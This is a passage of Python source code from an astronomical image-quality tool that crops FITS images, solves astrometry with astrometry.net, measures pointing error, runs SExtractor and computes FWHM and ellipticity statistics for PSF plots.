int(MatchROI.group(2))\n crop_y1 = int(MatchROI.group(3))\n crop_y2 = int(MatchROI.group(4))\n self.logger.debug(\" Cropping Image To [{0}:{1},{2}:{3}]\".format(\\\n crop_x1, crop_x2, crop_y1, crop_y2))\n with fits.open(self.working_file, mode=\"update\") as hdulist:\n hdulist[0].data = hdulist[0].data[crop_y1:crop_y2,\\\n crop_x1:crop_x2]\n if ('CRPIX1' in hdulist[0].header) and\\\n ('CRPIX2' in hdulist[0].header):\n hdulist[0].header['CRPIX1'] -= crop_x1\n hdulist[0].header['CRPIX2'] -= crop_y1\n hdulist.flush()\n self.cropped = True\n self.original_nXPix = self.nXPix\n self.original_nYPix = self.nYPix\n self.read_header()\n else:\n self.logger.warning('Can not crop image. ROI \"{}\" not parsed.'.format(\\\n self.tel.ROI))\n return False\n else:\n self.logger.warning('Can not crop image. 
No region of interest defined.')\n return False\n\n\n ##-------------------------------------------------------------------------\n ## Solve Astrometry Using astrometry.net\n ##-------------------------------------------------------------------------\n def solve_astrometry(self, downsample=None, SIP=None, timeout=60):\n '''\n Solve astrometry in the working image using the astrometry.net solver.\n '''\n start_time = datetime.datetime.now()\n self.logger.info(\"Attempting to solve WCS using Astrometry.net solver.\")\n AstrometryCommand = [\"solve-field\", \"-O\", \"-p\",\n \"-L\", str(self.tel.pixel_scale.value*0.75),\n \"-H\", str(self.tel.pixel_scale.value*1.25),\n \"-u\", \"arcsecperpix\"]\n if not SIP:\n AstrometryCommand.extend(['-T'])\n else:\n try:\n SIP_order = int(SIP)\n AstrometryCommand.extend(['-t', str(SIP_order)])\n except:\n AstrometryCommand.extend(['-T'])\n if downsample:\n AstrometryCommand.extend([\"-z\", str(downsample)])\n AstrometryCommand.append(self.working_file)\n with open(os.path.join(self.tel.temp_file_path, 'astrometry_output.txt'), 'w') as AstrometrySTDOUT:\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n 'astrometry_output.txt'))\n self.logger.debug(' Calling astrometry.net with: {}'.format(\\\n ' '.join(AstrometryCommand)))\n\n StartTime = datetime.datetime.now()\n try:\n rtncode = subprocess.call(AstrometryCommand,\\\n stdout=AstrometrySTDOUT, stderr=AstrometrySTDOUT,\\\n timeout=timeout)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('Astrometry.net timed out')\n rtncode = 1\n\n EndTime = datetime.datetime.now()\n duration = EndTime - StartTime\n\n with open(os.path.join(self.tel.temp_file_path, 'astrometry_output.txt'), 'r') as AstrometrySTDOUT:\n output = AstrometrySTDOUT.readlines()\n\n if rtncode != 0:\n self.logger.warning(\"Astrometry.net failed.\")\n for line in output:\n self.logger.debug(' astrometry.net output: {}'.format(line.strip('\\n')))\n self.astrometry_solved = False\n else:\n for line in output:\n self.logger.debug(' Astrometry.net Output: {}'.format(line.strip('\\n')))\n total_process_time = (EndTime - StartTime).total_seconds()\n self.logger.debug(\" Astrometry.net Processing Time: {:.1f} s\".format(\\\n total_process_time))\n regexp = \"Field center:\\s\\(RA\\sH:M:S,\\sDec D:M:S\\)\\s=\\s\"+\\\n \"\\((\\d{1,2}:\\d{2}:\\d{2}\\.\\d+,\\s[+-]?\\d{1,2}:\\d{2}:\\d{2}\\.\\d+)\\)\"\n IsFieldCenter = re.search(regexp, ''.join(output))\n if IsFieldCenter:\n self.logger.info(\" Astrometry.net field center is: {}\".format(\\\n IsFieldCenter.group(1)))\n else:\n self.logger.warning(\"Could not parse field center from astrometry.net output.\")\n for line in output:\n self.logger.debug(' astrometry.net output: {}'.format(line.strip('\\n')))\n\n NewFile = self.working_file.replace(self.file_ext, \".new\")\n NewFitsFile = self.working_file.replace(self.file_ext, \".new.fits\")\n if os.path.exists(NewFile):\n self.logger.debug(\" Found {}\".format(NewFile))\n self.logger.debug(\" Astrometry.net succeeded\")\n if os.path.exists(NewFitsFile): os.remove(NewFitsFile)\n os.rename(NewFile, NewFitsFile)\n self.astrometry_solved = True\n self.working_file = NewFitsFile\n self.read_header()\n else:\n self.logger.warning(\"No new file created by astrometry.net\")\n self.astrometry_solved = False\n ## Add files created by astrometry.net to temp_files list\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".axy\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n 
self.raw_file_basename+\".wcs\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".solved\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".rdls\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".match\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\n self.raw_file_basename+\".corr\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".new.fits\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\"-indx.xyls\"))\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done with astrometry.net in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n return self.astrometry_solved\n\n\n ##-----------------------------------------------------------------------------\n ## Determine Orientation from WCS\n ##-----------------------------------------------------------------------------\n def orientation_from_wcs(self):\n '''\n Given an astropy.wcs.WCS object, return a tuple containing the pixel scale,\n position angle (in degrees), and the flipped state (a boolean) of the image\n calculated from the PCn_m matrix (no distortions considered).\n '''\n ## Check that the WCS exists in the image_WCS object\n if not self.image_WCS:\n self.read_header()\n if not self.image_WCS:\n self.logger.warning('No WCS found in header. No orientation calculated.')\n else:\n ## Check if the image_WCS is actually an astropy.wcs.WCS object\n if isinstance(self.image_WCS, wcs.WCS):\n ## By using the wcs to_header to make a new WCS object, we \n ## ensure that the CD matrix, if it exists, is converted to PC\n header = wcs.WCS(self.image_WCS.to_header()).to_header()\n if ('CTYPE1' in header.keys()) and ('CTYPE2' in header.keys()) and\\\n ('WCSAXES' in header.keys()):\n if (header['CTYPE1'][0:4] == 'RA--') or (header['CTYPE1'][0:4] == 'DEC-') and\\\n (header['CTYPE2'][0:4] == 'RA--') or (header['CTYPE2'][0:4] == 'DEC-') and\\\n (int(header['WCSAXES']) == 2) and\\\n ('PC1_1' in header.keys()) and\\\n ('PC1_2' in header.keys()) and\\\n ('PC2_1' in header.keys()) and\\\n ('PC2_2' in header.keys()) and\\\n ('CDELT1' in header.keys()) and\\\n ('CDELT2' in header.keys()):\n ## If the wcs in header format meets all of the above\n ## assumptions, do nothing and proceed to header analysis.\n self.logger.debug(' Header has expected keywords')\n# self.logger.debug(' {}'.format(header))\n else:\n self.logger.warning('WCS does not match expected contents.')\n for key in header.keys():\n self.logger.debug(' {:8s} = {}'.format(key, header[key]))\n header = None\n self.image_WCS = None\n else:\n self.logger.warning('WCS does not have expected keywords.')\n for key in header.keys():\n self.logger.debug(' {:8s} = {}'.format(key, header[key]))\n header = None\n self.image_WCS = None\n\n if header:\n ## By using the wcs to_header to make a new WCS object, we convert CD to PC\n PC = wcs.WCS(self.image_WCS.to_header()).wcs.pc\n cdelt1 = float(header['CDELT1'])\n cdelt2 = float(header['CDELT2'])\n\n ## Determine Pixel Scale\n result1 = PC.dot(np.array([[0], [1]]))\n pixel_scale1 = cdelt1*(math.sqrt(result1[0][0]**2 + result1[1][0]**2))*3600.\n result2 = PC.dot(np.array([[1], [0]]))\n pixel_scale2 = cdelt2*(math.sqrt(result2[0][0]**2 + result2[1][0]**2))*3600.\n ## Just average the pixel scale values for each direction\n pixel_scale = np.mean([pixel_scale1, 
pixel_scale2]) * u.arcsec/u.pix\n self.wcs_pixel_scale = pixel_scale\n\n ## Determine Position Angle\n PCnorm = pixel_scale.to(u.deg/u.pix).value\n angles = np.array([90*u.deg.to(u.radian) - np.arccos(PC[0][0]/PCnorm),\\\n 90*u.deg.to(u.radian) - np.arcsin(-1*PC[0][1]/PCnorm),\\\n 90*u.deg.to(u.radian) - np.arcsin(PC[1][0]/PCnorm),\\\n 90*u.deg.to(u.radian) - np.arccos(PC[1][1]/PCnorm),\\\n ]) * u.radian\n self.position_angle = angles[~np.isnan(angles)].mean().to(u.deg)\n\n ## Determine Flip State\n flipped = np.linalg.det(PC) > 0\n self.image_flipped = flipped\n else:\n self.wcs_pixel_scale = None\n self.position_angle = None\n self.image_flipped = None\n\n\n ##-------------------------------------------------------------------------\n ## Determine Pointing Error\n ##-------------------------------------------------------------------------\n def determine_pointing_error(self):\n '''\n Determine pointing error (difference between object's coordinates and\n solved WCS).\n '''\n self.logger.info(\"Detemining pointing error based on WCS solution\")\n try:\n center_from_WCS = self.image_WCS.wcs_pix2world([[self.nXPix/2, self.nYPix/2]], 1)\n self.logger.debug(\" Using coordinates of center point: {0} {1}\".format(\\\n center_from_WCS[0][0], center_from_WCS[0][1]))\n self.coordinate_of_center_pixel = coords.SkyCoord(\\\n ra=center_from_WCS[0][0],\\\n dec=center_from_WCS[0][1],\\\n unit=(u.degree, u.degree),\\\n frame='icrs')\n self.pointing_error = self.coordinate_of_center_pixel.separation(\\\n self.coordinate_from_header)\n self.logger.debug(\" Header Coordinate: {}\".format(\\\n self.coordinate_from_header.to_string(\\\n style='hmsdms', precision=1)))\n self.logger.debug(\" Center Coordinate: {}\".format(\\\n self.coordinate_of_center_pixel.to_string(\\\n style='hmsdms', precision=1)))\n self.logger.info(\" Pointing Error is {:.2f} arcmin\".format(\\\n self.pointing_error.arcminute))\n except:\n self.logger.warning(\"Pointing error not calculated.\")\n ## Flag pointing error\n try:\n if self.pointing_error.arcminute > self.tel.threshold_pointing_err.to(u.arcmin).value:\n self.flags['pointing error'] = True\n else:\n self.flags['pointing error'] = False\n except:\n pass\n\n\n ##-------------------------------------------------------------------------\n ## Run SExtractor\n ##-------------------------------------------------------------------------\n def run_SExtractor(self, assoc=False, params=None, timeout=60):\n '''\n Run SExtractor on image.\n '''\n start_time = datetime.datetime.now()\n\n sextractor_executable = None\n try:\n result = subprocess.check_output(['sex', '-d'])\n except OSError as e:\n self.logger.debug(' Did not find source extractor executable as sex')\n try:\n result = subprocess.check_output(['sextractor', '-d'])\n except OSError as e:\n self.logger.debug(' Did not find source extractor executable as sextractor')\n else:\n sextractor_executable = 'sextractor'\n else:\n sextractor_executable = 'sex'\n\n if not sextractor_executable:\n logger.error('Could not find source extractor executable')\n return False\n\n if assoc and self.catalog_data:\n self.catalog_filter = None\n if self.header['FILTER']:\n if self.header['FILTER'] in self.catalog_data.keys():\n self.catalog_filter = self.header['FILTER']\n elif self.tel.config['catalog'][self.filter] in self.catalog_data.keys():\n self.catalog_filter = self.tel.config['catalog'][self.filter]\n else:\n self.logger.warning(' Filter in header ({}), not found in catalog table.'.format(\\\n self.header['FILTER']))\n self.catalog_filter 
= None\n else:\n self.catalog_filter = None\n ## Find Filter to Use\n if not self.catalog_filter:\n filters = ['r', 'R2mag', 'i', 'Imag', 'g', 'V', 'B', 'B2mag']\n for filt in filters:\n if not self.catalog_filter and (filt in self.catalog_data.keys()):\n self.logger.info(' Using {} filter for catalog magnitudes.'.format(filt))\n self.catalog_filter = filt\n if not self.catalog_filter:\n ## Choose whatever is in catalog\n self.catalog_data.keys().remove('ID')\n self.catalog_data.keys().remove('RA')\n self.catalog_data.keys().remove('Dec')\n self.catalog_filter = self.catalog_data.keys()[0]\n self.logger.info(' Using {} filter for catalog magnitudes.'.format(self.catalog_filter))\n\n ## Set up file names\n self.SExtractor_catalogfile = os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".cat\")\n self.temp_files.append(self.SExtractor_catalogfile)\n\n ## Remove catalog file from previous run of SExtractor (if it exists)\n if os.path.exists(self.SExtractor_catalogfile):\n os.remove(self.SExtractor_catalogfile)\n\n sextractor_output_param_file = os.path.join(self.tel.temp_file_path,\\\n '{}.param'.format(self.raw_file_basename))\n if os.path.exists(sextractor_output_param_file):\n os.remove(sextractor_output_param_file)\n with open(sextractor_output_param_file, 'w') as defaultparamsFO:\n output_params = [\n 'XWIN_IMAGE', 'YWIN_IMAGE', \n 'AWIN_IMAGE', 'BWIN_IMAGE', 'FWHM_IMAGE', 'THETAWIN_IMAGE',\n 'ERRAWIN_IMAGE', 'ERRBWIN_IMAGE', 'ERRTHETAWIN_IMAGE',\n 'ELONGATION', 'ELLIPTICITY',\n 'FLUX_AUTO', 'FLUXERR_AUTO', 'MAG_AUTO', 'MAGERR_AUTO',\n 'FLAGS', 'FLAGS_WEIGHT', 'FLUX_RADIUS'\n ]\n if assoc: output_params.append('VECTOR_ASSOC(3)')\n for output_param in output_params:\n defaultparamsFO.write(output_param+'\\n')\n self.temp_files.append(sextractor_output_param_file)\n\n ## Compare input parameters dict to default\n SExtractor_default = {\n 'CATALOG_NAME': self.SExtractor_catalogfile,\n 'CATALOG_TYPE': 'FITS_LDAC',\n 'PARAMETERS_NAME': sextractor_output_param_file,\n 'GAIN': self.tel.gain.value,\n 'GAIN_KEY': 'GAIN',\n 'PIXEL_SCALE': '{:.3f}'.format(self.tel.pixel_scale.value),\n 'CHECKIMAGE_TYPE': 'NONE',\n }\n\n SExtractor_params = SExtractor_default\n if self.tel.SExtractor_params:\n for key in self.tel.SExtractor_params.keys():\n SExtractor_params[key] = self.tel.SExtractor_params[key]\n if params:\n for key in params.keys():\n SExtractor_params[key] = params[key]\n\n if assoc:\n ## Create Assoc file with pixel coordinates of catalog stars\n assoc_file = os.path.join(self.tel.temp_file_path, self.raw_file_basename+'_assoc.txt')\n SExtractor_params['ASSOC_NAME'] = assoc_file\n SExtractor_params['ASSOC_DATA'] = '1,2,3'\n SExtractor_params['ASSOC_PARAMS'] = '1,2,3'\n SExtractor_params['ASSOCCOORD_TYPE'] = 'PIXEL'\n if not 'ASSOC_RADIUS' in SExtractor_params.keys():\n SExtractor_params['ASSOC_RADIUS'] = '2.0'\n if not 'ASSOC_TYPE' in SExtractor_params.keys():\n SExtractor_params['ASSOC_TYPE'] = 'NEAREST'\n if not 'ASSOCSELEC_TYPE' in SExtractor_params.keys():\n SExtractor_params['ASSOCSELEC_TYPE'] = 'MATCHED'\n self.temp_files.append(assoc_file)\n if os.path.exists(assoc_file): os.remove(assoc_file)\n\n with open(assoc_file, 'w') as assocFO:\n for star in self.catalog_data:\n pix = self.image_WCS.wcs_world2pix([[star['RA'], star['Dec']]], 1)\n try:\n assocFO.write('{:8.1f} {:8.1f} {:8.1f}\\n'.format(\\\n pix[0][0], pix[0][1],\\\n star[self.catalog_filter],\\\n ))\n except ValueError:\n assocFO.write('{:8.1f} {:8.1f} {:8.1f}\\n'.format(\\\n pix[0][0], pix[0][1],\\\n 
float('nan'),\\\n ))\n except:\n print('Skipped: {} {} {}'.format(pix[0][0], pix[0][1], star[self.catalog_filter]))\n\n ## Add ASSOC parameters\n original_params = self.tel.SExtractor_params\n self.tel.SExtractor_params['ASSOC_NAME'] = assoc_file\n self.tel.SExtractor_params['ASSOC_DATA'] = '0'\n self.tel.SExtractor_params['ASSOC_PARAMS'] = '1,2,3'\n self.tel.SExtractor_params['ASSOC_RADIUS'] = '2.0'\n self.tel.SExtractor_params['ASSOC_TYPE'] = 'NEAREST'\n self.tel.SExtractor_params['ASSOCSELEC_TYPE'] = 'MATCHED'\n\n ## Run SExtractor\n SExtractorCommand = [sextractor_executable, self.working_file]\n for key in SExtractor_params.keys():\n SExtractorCommand.append('-{}'.format(key))\n SExtractorCommand.append('{}'.format(SExtractor_params[key]))\n self.logger.info(\"Invoking SExtractor\")\n self.logger.debug(\" SExtractor command: {}\".format(' '.join(SExtractorCommand)))\n try:\n SExSTDOUT = subprocess.check_output(SExtractorCommand, timeout=timeout,\\\n stderr=subprocess.STDOUT, universal_newlines=True)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('SExtractor timed out')\n self.SExtractor_results = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n except OSError as e:\n if e.errno == 2:\n self.logger.error('Could not find sextractor executable. Is sextractor installed?')\n self.logger.error(\"SExtractor failed. ErrNo: {}\".format(e.errno))\n self.logger.error(\"SExtractor failed. StrErr: {}\".format(e.strerror))\n self.SExtractor_results = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n except subprocess.CalledProcessError as e:\n self.logger.error(\"SExtractor failed. Returncode: {}\".format(e.returncode))\n self.logger.error(\"SExtractor failed. Output: {}\".format(e.output))\n self.SExtractor_results = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n except:\n self.logger.error(\"SExtractor process failed: {0} {1} {2}\".format(\\\n sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2]))\n self.SExtractor_results = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n else:\n for line in SExSTDOUT.splitlines():\n line.replace(\"[1A\", \"\")\n line.replace(\"[1M>\", \"\")\n MatchVersion = re.search('SExtractor (\\d+\\.\\d+\\.\\d+) started on', line)\n if MatchVersion:\n self.logger.debug(' SExtractor version = {}'.format(MatchVersion.group(1)))\n if not re.match(\".*Setting up background map.*\", line) and\\\n not re.match(\".*Line:\\s[0-9]*.*\", line):\n self.logger.debug(\" SExtractor Output: {}\".format(line))\n ## Extract Number of Stars from SExtractor Output\n pos = SExSTDOUT.find(\"sextracted \")\n IsSExCount = re.match(\"\\s*([0-9]+)\\s+\", SExSTDOUT[pos+11:pos+21])\n if IsSExCount:\n nSExtracted = int(IsSExCount.group(1))\n self.logger.info(\" SExtractor found {0} sources.\".format(nSExtracted))\n ## Extract Background Level from SExtractor Output\n pos = SExSTDOUT.find(\"Background: \")\n IsSExBkgnd = re.match(\"\\s*([0-9\\.]+)\\s*\", SExSTDOUT[pos+11:pos+21])\n if IsSExBkgnd:\n self.SExtractor_background = float(IsSExBkgnd.group(1))\n self.logger.debug(\" SExtractor background is {0:.1f}\".format(\\\n self.SExtractor_background))\n else:\n self.SExtractor_background = None\n ## Extract Background RMS from SExtractor Output\n IsSExtractor_background_RMS = re.match(\"\\s*RMS:\\s([0-9\\.]+)\\s*\",\\\n SExSTDOUT[pos+21:pos+37])\n if IsSExtractor_background_RMS:\n self.SExtractor_background_RMS = 
float(IsSExtractor_background_RMS.group(1))\n self.logger.debug(\" SExtractor background RMS is {0:.1f}\".format(\\\n self.SExtractor_background_RMS))\n else:\n self.SExtractor_background_RMS = None\n\n ## If No Output Catalog Created ...\n if not os.path.exists(self.SExtractor_catalogfile):\n self.logger.warning(\"SExtractor failed to create catalog.\")\n self.SExtractor_catalogfile = None\n else:\n ## Read FITS_LDAC SExtractor Catalog\n self.logger.debug(\" Reading SExtractor output catalog.\")\n with fits.open(self.SExtractor_catalogfile) as hdu:\n results = table.Table(hdu[2].data)\n\n rows_to_remove = []\n for i in range(0,len(results)):\n if results['FLAGS'][i] != 0:\n rows_to_remove.append(i)\n if len(rows_to_remove) > 0:\n results.remove_rows(rows_to_remove)\n\n self.SExtractor_results = results\n SExImageRadius = []\n SExAngleInImage = []\n assoc_x = []\n assoc_y = []\n assoc_catmag = []\n for star in self.SExtractor_results:\n SExImageRadius.append(math.sqrt((self.nXPix/2-star['XWIN_IMAGE'])**2 +\\\n (self.nYPix/2-star['YWIN_IMAGE'])**2))\n SExAngleInImage.append(math.atan((star['XWIN_IMAGE']-self.nXPix/2) /\\\n (self.nYPix/2-star['YWIN_IMAGE']))*180.0/math.pi)\n if assoc:\n assoc_x.append(star['VECTOR_ASSOC'][0])\n assoc_y.append(star['VECTOR_ASSOC'][1])\n assoc_catmag.append(star['VECTOR_ASSOC'][2])\n self.SExtractor_results.add_column(table.Column(\\\n data=SExImageRadius, name='ImageRadius'))\n self.SExtractor_results.add_column(table.Column(\\\n data=SExAngleInImage, name='AngleInImage'))\n self.n_stars_SExtracted = len(self.SExtractor_results)\n self.logger.info(\" Read in {0} stars from SExtractor catalog (after filtering).\".format(\\\n self.n_stars_SExtracted))\n if assoc:\n self.SExtractor_results.add_column(table.Column(\\\n data=assoc_x, name='assoc_x'))\n self.SExtractor_results.add_column(table.Column(\\\n data=assoc_y, name='assoc_y'))\n self.SExtractor_results.add_column(table.Column(\\\n data=assoc_catmag, name='assoc_catmag'))\n self.tel.SExtractor_params = original_params\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done running SExtractor in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Determine Image FWHM from SExtractor Catalog\n ##-------------------------------------------------------------------------\n def determine_FWHM(self, plot=False):\n '''\n Determine typical FWHM of image from SExtractor results.\n '''\n if self.n_stars_SExtracted > 1:\n self.logger.info('Analyzing SExtractor results to determine typical image quality.')\n if not self.tel.PSF_measurement_radius:\n DiagonalRadius = math.sqrt((self.nXPix/2)**2+(self.nYPix/2)**2)\n self.tel.PSF_measurement_radius = DiagonalRadius * u.pix\n self.logger.info(' Using all stars in image.')\n else:\n self.logger.info(' Using stars within {:d} pix for IQ measurement'.format(\\\n int(self.tel.PSF_measurement_radius.to(u.pix).value)))\n\n CentralFWHMs = [star['FWHM_IMAGE']\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n CentralEllipticities = [star['ELLIPTICITY']\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n ## Weights assumes that uncertainty on a given measurement of the\n ## FWHM is equal to 1/SNR pixels\n weights = [(star['FLUX_AUTO'] / star['FLUXERR_AUTO'])**2\\\n for star in self.SExtractor_results\\\n if 
(star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n\n if len(CentralFWHMs) > 3:\n self.FWHM_mode = mode(CentralFWHMs, 0.2) * u.pix\n self.FWHM_median = np.median(CentralFWHMs) * u.pix\n self.FWHM_average = np.average(CentralFWHMs, weights=weights) * u.pix\n self.FWHM_average_uncertainty = (np.sum(weights))**-0.5 * u.pix\n self.FWHM = self.FWHM_average\n self.ellipticity_mode = mode(CentralEllipticities, 0.05) \n self.ellipticity_median = np.median(CentralEllipticities)\n self.ellipticity_average = np.average(CentralEllipticities, weights=weights)\n self.ellipticity = self.ellipticity_median\n self.logger.debug(\" Using {0} stars in central {1} to determine PSF quality.\".format(\\\n len(CentralFWHMs),\\\n self.tel.PSF_measurement_radius))\n self.logger.debug(\" Mode FWHM in inner region is {0:.2f} pixels\".format(\\\n self.FWHM_mode.to(u.pix).value))\n self.logger.debug(\" Median FWHM in inner region is {0:.2f} pixels\".format(\\\n self.FWHM_median.to(u.pix).value))\n self.logger.info(\" Average FWHM in inner region is {0:.2f}\".format(\\\n self.FWHM_average.to(u.pix).value))\n# self.logger.info(\" Average FWHM in inner region is {0:.2f} +/- {1:.2f} pixels\".format(\\\n# self.FWHM_average.to(u.pix).value,\\\n# self.FWHM_average_uncertainty.to(u.pix).value))\n\n self.logger.debug(\" Mode Ellipticity in inner region is {0:.2f}\".format(\\\n self.ellipticity_mode))\n self.logger.debug(\" Median Ellipticity in inner region is {0:.2f}\".format(\\\n self.ellipticity_median))\n self.logger.info(\" Average Ellipticity in inner region is {0:.2f}\".format(\\\n self.ellipticity_average))\n else:\n self.logger.warning(\" Only detected {} stars in central region.\".format(\\\n len(CentralFWHMs)))\n self.logger.warning(\" No FWHM or ellipticity calculated.\")\n self.FWHM_mode = None\n self.FWHM_median = None\n self.FWHM_average = None\n self.FWHM = None\n self.ellipticity_mode = None\n self.ellipticity_median = None\n self.ellipticity_average = None\n self.ellipticity = None\n else:\n self.FWHM_mode = None\n self.FWHM_median = None\n self.FWHM_average = None\n self.FWHM = None\n self.ellipticity_mode = None\n self.ellipticity_median = None\n self.ellipticity_average = None\n self.ellipticity = None\n ## Flag FWHM\n try:\n if self.FWHM > self.tel.threshold_FWHM.to(u.pix,\\\n equivalencies=self.tel.pixel_scale_equivalency):\n self.flags['FWHM'] = True\n else:\n self.flags['FWHM'] = False\n except:\n pass\n ## Check ellipticity\n try:\n if self.ellipticity > self.tel.threshold_ellipticity:\n self.flags['ellipticity'] = True\n else:\n self.flags['ellipticity'] = False\n except:\n pass\n\n ## Make Plot if Requested\n if plot:\n self.make_PSF_plot()\n\n\n ##-------------------------------------------------------------------------\n ## Make PSF Statistics Plots\n ##-------------------------------------------------------------------------\n def make_PSF_plot(self, filename=None):\n '''\n Make various plots for analysis of image quality.\n '''\n start_time = datetime.datetime.now()\n import matplotlib.pyplot as pyplot\n\n if not self.FWHM:\n self.logger.warning('No FWHM statistics found. 
Skipping PSF plot creation.')\n self.PSF_plot_filename = None\n self.PSF_plot_file = None\n return\n else:\n if filename:\n self.PSF_plot_filename = filename\n else:\n self.PSF_plot_filename = self.raw_file_basename+'_PSFinfo.png'\n self.logger.info('Generating plots of PSF statistics: {}'.format(self.PSF_plot_filename))\n self.PSF_plot_file = os.path.join(self.tel.plot_file_path, self.PSF_plot_filename)\n\n ellip_threshold = 0.15\n star_angles = [star['THETAWIN_IMAGE']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n image_angles = [star['AngleInImage']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n star_x = [star['XWIN_IMAGE']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n star_y = [star['YWIN_IMAGE']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n uncorrected_diffs = [star['THETAWIN_IMAGE']-star['AngleInImage']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n\n CentralFWHMs = [star['FWHM_IMAGE']\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n CentralEllipticities = [star['ELLIPTICITY']\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n\n nstars = len(star_angles)\n self.logger.debug(' Found {} stars with ellipticity greater than {:.2f}.'.format(\\\n nstars, ellip_threshold))\n\n angle_diffs = []\n for angle in uncorrected_diffs:\n if angle < -90:\n angle_diffs.append(angle + 90.)\n elif angle > 90:\n angle_diffs.append(angle - 90.)\n else:\n angle_diffs.append(angle)\n angle_binsize = 10\n diff_hist, diff_bins = np.histogram(angle_diffs, bins=angle_binsize*(np.arange(37)-18))\n angle_hist, angle_bins = np.histogram(star_angles, bins=angle_binsize*(np.arange(37)-18))\n angle_centers = (diff_bins[:-1] + diff_bins[1:]) / 2\n\n ellip_binsize = 0.05\n ellip_bmin = math.floor(min(CentralEllipticities)/ellip_binsize)*ellip_binsize - ellip_binsize/2.\n ellip_bmax = math.ceil(max(CentralEllipticities)/ellip_binsize)*ellip_binsize + ellip_binsize/2.\n ellip_bins = np.arange(ellip_bmin,ellip_bmax,ellip_binsize)\n ellip_hist, ellip_bins = np.histogram(CentralEllipticities, bins=ellip_bins)\n ellip_centers = (ellip_bins[:-1] + ellip_bins[1:]) / 2\n\n fwhm_binsize = 0.2\n fwhm_bmin = math.floor(min(CentralFWHMs)/fwhm_binsize)*fwhm_binsize - fwhm_binsize/2.\n fwhm_bmax = math.ceil(max(CentralFWHMs)/fwhm_binsize)*fwhm_binsize + fwhm_binsize/2.\n fwhm_bins = np.arange(fwhm_bmin,fwhm_bmax,fwhm_binsize)\n fwhm_hist, fwhm_bins = np.histogram(CentralFWHMs, bins=fwhm_bins)\n fwhm_centers = (fwhm_bins[:-1] + fwhm_bins[1:]) / 2\n\n star_angle_mean = np.mean(star_angles)\n star_angle_median = np.median(star_angles)\n angle_diff_mean = np.mean(angle_diffs)\n angle_diff_median = np.median(angle_diffs)\n self.logger.debug(' Mean Stellar PA = {:.0f}'.format(star_angle_mean))\n self.logger.debug(' Median Stellar PA = {:.0f}'.format(star_angle_median))\n self.logger.debug(' Mean Difference Angle = {:.0f}'.format(angle_diff_mean))\n self.logger.debug(' Median Difference Angle = {:.0f}'.format(angle_diff_median))\n\n if self.PSF_plot_file:\n self.logger.debug(' Generating figure {}'.format(self.PSF_plot_file))\n\n pyplot.ioff()\n fig = pyplot.figure(figsize=(10,11), dpi=100)\n\n TopLeft = pyplot.axes([0.000, 0.750, 0.465, 0.235])\n pyplot.title('Histogram of FWHM Values for 
{}'.format(self.raw_file_name), size=10)\n pyplot.bar(fwhm_centers, fwhm_hist, align='center', width=0.7*fwhm_binsize)\n pyplot.plot([self.FWHM_mode.to(u.pix).value, self.FWHM_mode.to(u.pix).value],\\\n [0, 1.1*max(fwhm_hist)],\\\n 'ro-', linewidth=2, label='Mode FWHM', alpha=0.3)\n pyplot.plot([self.FWHM_median.to(u.pix).value, self.FWHM_median.to(u.pix).value],\\\n [0, 1.1*max(fwhm_hist)],\\\n 'go-', linewidth=2, label='Median FWHM', alpha=0.3)\n pyplot.plot([self.FWHM_average.to(u.pix).value, self.FWHM_average.to(u.pix).value],\\\n [0, 1.1*max(fwhm_hist)],\\\n 'bo-', linewidth=2, label='Average FWHM', alpha=1.0)\n pyplot.xlabel('FWHM (pixels)', size=10)\n pyplot.ylabel('N Stars', size=10)\n pyplot.xlim(0,np.percentile(CentralFWHMs, 95)+1)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n TopRight = pyplot.axes([0.535, 0.750, 0.465, 0.235])\n pyplot.title('Histogram of Ellipticity Values for {}'.format(self.raw_file_name), size=10)\n pyplot.bar(ellip_centers, ellip_hist, align='center', width=0.7*ellip_binsize)\n pyplot.plot([self.ellipticity_mode, self.ellipticity_mode], [0, 1.1*max(ellip_hist)],\\\n 'ro-', linewidth=2, label='Mode Ellipticity', alpha=0.3)\n pyplot.plot([self.ellipticity_median, self.ellipticity_median], [0, 1.1*max(ellip_hist)],\\\n 'go-', linewidth=2, label='Median 